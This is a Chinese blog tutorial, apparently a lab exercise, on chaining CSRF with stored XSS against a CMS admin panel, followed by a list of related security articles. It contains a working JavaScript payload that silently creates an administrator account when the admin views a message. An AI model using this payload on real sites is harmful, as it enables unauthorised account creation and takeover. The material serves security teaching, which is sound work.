CSRF与XSS结合利用

已于 2023-08-28 21:02:02 修改
阅读量474 收藏
点赞数 1
分类专栏: 网络安全 文章标签: csrf xss 前端
于 2023-08-28 20:51:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56578216/article/details/132548128
版权
本文详细阐述了一次利用CSRF和XSS结合进行攻击的实例。首先通过登录CMS后台创建新账户,接着捕获POST请求修改管理员密码。然后构造含有恶意JS代码的XSS留言,当管理员查看留言时触发攻击,导致EMT用户密码被修改,成功实现非法登录。
摘要由CSDN通过智能技术生成

文章目录

修改cms网站后台管理员密码

CSRF和XSS结合的JS代码:

<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","http://10.4.7.130/cms/admin/user.action.php",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=ajest&password=123.com&password2=123.com&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>

登录cms管理员后台,创建一个新账户:

在这里插入图片描述

修改密码并用bp抓包,抓到的post请求包如下:

POST /cms/admin/user.ac
了解本专栏 订阅专栏 解锁全文 超级会员免费看
EMT00923
关注
专栏目录
订阅专栏
xss结合csrf实验】
一纸荒芜的博客
09-07 1989
通常xss漏洞可以和csrf漏洞结合使用,今天就做一个小的实验举例,漏洞主要利用的是用户修改敏感信息的未退出状态,并且修改信息不需要验证时很容易被伪造,当我们发现存在csrf漏洞时,可构造url请求信息,配合xss漏洞去配合诱导访问。本实验由本地搭建的pikachu靶场做演示。 本期简单介绍了xss漏洞与csrf漏洞的配合使用。
XSS+CSRF组合拳
weixin_50464560的博客
03-12 2498
0x00 前言 今天学习一下 XSS + CSRF 组合拳,现将笔记记录如下。 0x01 靶场环境 本机(Win):192.168.38.1 DVWA(Win):192.168.38.132 Beef(Kali):192.168.38.129 0x02 组合拳思路 第一拳:存储型 XSS + CSRF(存储型 XSS 攻击代码中加入 CSRF 代码链接) 第二拳:CSRF + SelfXSSCSRF 代码中加入 SelfXSS 代码) 0x03...
学习 xss+csrf 组合拳
weixin_67259816的博客
05-28 3371
该篇文章记录了xss+csrf的组合拳,无论是存储型xss还是反射型xsscsrf结合在一块,都会有一个更强大的收获。
XSS漏洞04】XSS漏洞对shellcode的调用方法
Fighting_hawk的博客
02-24 3098
1. shellcode可以存储在远程文件、URL、HTTP头、其他网页中; 2. 通过多种方式利用XSS漏铜触发shellcode执行; 3. 利用XSS下载器与http头信息的方法还需要加强。
xss+csrf的组合拳
wo41ge的博客
12-16 3314
今天 就把之前学的东西简单的总结一下吧 【第一拳】存储型 XSS + CSRF
xss+csrf组合拳这么玩
yggcwhat
05-28 960
xss+csrf组合拳这么玩
CSRF+XSS组合拳实战
yuan_boss的博客
08-28 1966
由于CSRF利用条件比较苛刻,需要受害者点击恶意请求。因此我们可需要借助XSS来扩大危害,借用XSS漏洞执行JS代码,让JS直接发起请求,从而不需要让受害者点击恶意请求了。在实战中,如果我们发现了XSS存储型漏洞,我们也可以尝试寻找CSRF漏洞,进而扩大危害。
CSRFXSS组合拳
weixin_60719780的博客
01-17 1146
简单的xsscsrf的组合利用
CSRF+Self XSS
newlife1441的博客
08-16 609
CSRF,跨站请求攻击,简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并运行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去运行。。防御原理:由于服务端没有对客户端进行身份校验,所以我们可以通过添加令牌token、验证码等方法来防御csrfCSRF 利用的是网站对用户浏览器的信任。Self XSS,自己输入xss脚本,输出仅自己看到,仅xss。............
前端安全:CSRFXSS该怎么防御?
椰卤工程师的个人博客
11-12 2434
XSS是后端的责任,后端应该在用户提交数据的接口对隐私敏感的数据进行转义。NO,这种说法不对所有插到页面的数据,都要进行过滤转移,当没有敏感字符的时候,就可以直接插到页面上显示了。NO,丝毫没有什么作用XSS攻击是页面被注入了恶意的代码,利用恶意脚本,攻击者可以获取用户的Cookie、SessionID等敏感信息。在HTML中内嵌的文本中,恶意内容通过script标签注入在内联的JS中,拼接的数据突破了原本的限制在标签属性中,恶意内容包含引导,从而突破属性值的限制。
CSRF+XSS基础学习
ce666666的博客
01-19 1215
前言 通过靶场学习csrfxss基础 CSRF原理 跨站请求伪造,利用网站对用户网页浏览器的信任,劫持用户当前已登录的WEB应用程序,执行非用户本意的操作。 存在三个角色User、WebA(存在漏洞的网站)、WebB(黑客攻击) 1.User首先登录并信任WebA,WebA通过用户验证会分发User浏览器一个Cookie。 2.WebB向WebA添加链接方式诱导User访问网站WebB。 3.当User点击链接方式,即WebB利用User的浏览器房屋内WebA,发出操作请求。 4。User的浏览器会带着
No.15 笔记 | CSRF 跨站请求伪造
l1x1n0的博客
10-10 1212
CSRF 即跨站请求伪造,是一种恶意利用网站漏洞的攻击方式。攻击者伪装用户请求盗取信息。有 GET 和 POST 等类型,常见于密码修改、转账等操作处。可通过使用 POST、加验证码、检查 Referer 和使用 Token 等防御。
dvwa:暴力破解、命令注入、csrf全难度详解
anddddoooo的博客
10-08 1328
如果登录失败,更新数据库使得用户登录失败次数+1,如果登录失败次数超过3次,account_locked将为false,下次登陆时必须等待 15分钟才会将account_locked设置为true。变量$_SERVER[ 'HTTP_REFERER' ]是否有$_SERVER[ 'SERVER_NAME' ],如果有,则说明当前修改密码的请求是从本网站跳转过来的,而不是从钓鱼网站跳转过来的,这里点的是巫师3,但显示下载成功的是赛博朋克,是因为这个返回页面我懒得该,直接返回的字符串。
渗透测试入门学习——使用python脚本自动跟踪csrf_token实现对网站登录界面的暴力破解
qq_44611153的博客
10-04 636
最近在学习使用Burp Suite时发现其intruder模块无法实现多种模式的混合使用,就如想要暴力破解账号和口令两个区域并同时跟踪网页的csrf_token时BP似乎不能很方便的实现这一功能,于是自己在练习时就想到了用python脚本的方式来弥补BP中的这一欠缺,其中的核心便是用python中的正则匹配库实现对Response内容的分析和定位需要获取的内容。
【网络安全】利用XSS、OAuth配置错误实现token窃取及账户接管 (ATO)
等风来
10-08 262
在过去,可以通过在两个子域名的 JavaScript 中显式设置 document.domain 来实现跨域访问,即在 sub1.target.com 和 auth.target.com 中都设置 document.domain = 'target.com';。这样,它们就共享了同一个源,浏览器将允许 JavaScript 之间的交互(例如相互访问变量、调用函数等)。
XSS全详解
重庆森林不在重庆的博客
10-09 821
XSS是Web安全常见漏洞之一,为探讨清楚XSS的诸多细节,作者把用到的知识进行了全面、详细、系统的总结。本文是经由xss-labs训练总结而来,配合作者的xss-labs通关全详解食用更佳(怎么可以光学习不训练呢)。
Web打点与WAF绕过技术具体实例(接上一篇)包含SQL注入绕过WAF、XSS绕过WAF、文件包含漏洞、命令注入
xixixi7777的博客
10-12 581
为了更好地理解和应用上一篇的Web打点与WAF绕过技术,本篇将通过具体示例进行详细说明。每个示例将在前面介绍的技术基础上,展示如何在实际场景中操作。
dvwa:xss全系列全难度解析
最新发布
anddddoooo的博客
10-12 619
引号内注入:^^^^^^^...</select>​引号外注入:^^^^^^^...</select>
csrfxss哪个危害大
06-21
Cross-Site Scripting (XSS) 和 Cross-Site Request Forgery (CSRF) 都是Web安全中常见的攻击类型,但它们的危害性质不同。 XSS(跨站脚本攻击)主要针对的是浏览器端,攻击者通过注入恶意脚本到网站的正常内容中,当用户浏览含有这些脚本的网页时,脚本会在用户的浏览器上执行,可能会窃取用户的敏感信息(如登录凭证、会话信息),甚至操纵用户的操作,如修改数据。由于脚本是在用户的浏览器中运行的,所以用户通常会有感知,防范相对容易一些。 CSRF(跨站请求伪造)则更为隐蔽,它利用的是用户的已登录状态,攻击者无需获取用户的敏感信息,只需诱导用户在不知情的情况下发送一个恶意请求给网站,完成诸如转账、修改设置等操作。因为这种攻击是基于用户已经授权的会话,所以用户通常不会察觉到异常。 综合来看,XSS的危害更直接,因为它可以立即对用户的隐私和数据安全造成影响,而CSRF的危害更多是间接的,可能导致用户的信任帐户被滥用。两者结合使用时,风险会进一步增加。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

EMT00923

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值